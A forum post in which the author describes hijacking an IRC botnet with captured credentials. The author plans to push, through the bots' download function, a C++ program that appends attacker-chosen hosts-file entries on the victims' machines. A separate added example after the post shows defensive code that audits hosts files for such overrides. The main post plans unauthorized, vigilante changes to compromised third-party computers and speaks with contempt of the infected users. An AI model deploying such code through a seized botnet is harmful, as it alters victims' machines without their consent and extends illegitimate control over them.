[Botnet] Simple redirect trick

Post by ayu

In this case it was meant for an infected machine to redirect a bot to another network, thus taking over the whole botnet when pushing it to all clients. But for those not so familiar with code like this, it simply opens a file and writes to it.


This is connected to a topic I started a little while ago concerning a small botnet that was growing fast. I destroyed most of it but the guy is still at it to make it grow again.

I got a hold of the updated version of his bot, thus getting his new login data to the bots (it's a simple IRC botnet, thus the data is sent in clear text).

My last attempt to redirect the bots to another network failed as it would seem that the guy controlling the bots has disabled a lot of features to make the bots stay where they are. But he didn't remove the download function in them so that he can keep updating them.

So, I intend to make them download this small program. It's just about as simple as it gets, but does huge damage to his botnet (no need to make it harder than it really is).

It simply adds two rows in the victim's hosts file, making the bots resolve his domain to whatever IP I specify. The only problem is that I need to find a server where I won't be disturbed, and that doesn't have a dynamic IP (not sure, but quakenet.org maybe?)

The first plan was to save the victims' computers by removing the bot, but after having a conversation with an owner of one of the infected machines (refer to the other botnet topic), I kind of lost hope for a while now. The bot was removed from that machine, but it was infected with a bunch of other stuff that made it almost useless, forcing the owner to eventually get help from someone to reinstall it.

People are too stupid when they are using their machines. So I intend to use the botnet to take down the creator of it instead (the creation beats its creator, heh).

Code:

#include <iostream>
#include <fstream>

using namespace std;

int main()
{
	//Initialize some shiny constants
	const char _IP1_[16]		= "xxx.xxx.xxx.xxx";
	const char _IP2_[16]		= "xxx.xxx.xxx.xxx";
	const char _DOMAIN1_[256]	= "irc.evilbotnethost.com";
	const char _DOMAIN2_[256]	= "evilbotnethost.com";

	//Write to host file
	fstream file("C:/Windows/System32/drivers/etc/hosts", ios::out | ios::app);
	file << "\n" << _IP1_ << "\t" << _DOMAIN1_;
	file << "\n" << _IP2_ << "\t" << _DOMAIN2_;
	file.close();

	return 0;
}
"The best place to hide a tree, is in a forest"

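Seen from the defending side, rows appended to the hosts file like the two above are straightforward to audit for: any hostname pinned to a non-local address overrides DNS on that machine. The following is an added example, not part of the original post; `audit_hosts`, `Finding`, the sample file contents and the 203.0.113.x documentation addresses are constructed for illustration.

```cpp
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// One hosts-file entry that overrides DNS with a non-local address.
struct Finding {
    int line;
    std::string ip;
    std::string host;
};

// Loopback and null-route targets are normal in hosts files (localhost, ad blocking).
static bool is_local(const std::string& ip) {
    return ip.rfind("127.", 0) == 0 || ip == "::1" || ip == "0.0.0.0";
}

// Return every hostname that the given hosts-file text pins to a non-local IP.
std::vector<Finding> audit_hosts(const std::string& text) {
    std::vector<Finding> out;
    std::istringstream in(text);
    std::string raw;
    for (int n = 1; std::getline(in, raw); ++n) {
        std::string line = raw.substr(0, raw.find('#'));  // strip comments
        std::istringstream fields(line);                  // splits on spaces, tabs, \r
        std::string ip, host;
        if (!(fields >> ip) || is_local(ip)) continue;
        while (fields >> host) out.push_back({n, ip, host});
    }
    return out;
}

// Constructed sample: a stock hosts file plus two tab-separated rows appended
// the way the posted program writes them (leading "\n", no trailing newline).
const std::string kSampleHosts =
    "# Copyright (c) Microsoft Corp.\r\n"
    "127.0.0.1       localhost\r\n"
    "::1             localhost\r\n"
    "0.0.0.0 ads.example.net # blocked\r\n"
    "\n203.0.113.10\tirc.evilbotnethost.com"
    "\n203.0.113.11\tevilbotnethost.com";

int main() {
    for (const Finding& f : audit_hosts(kSampleHosts))
        std::cout << "line " << f.line << ": " << f.host << " -> " << f.ip << "\n";
    return 0;
}
```

On a real machine the text would be read from the hosts file, and each finding compared against the entries the administrator is known to have added.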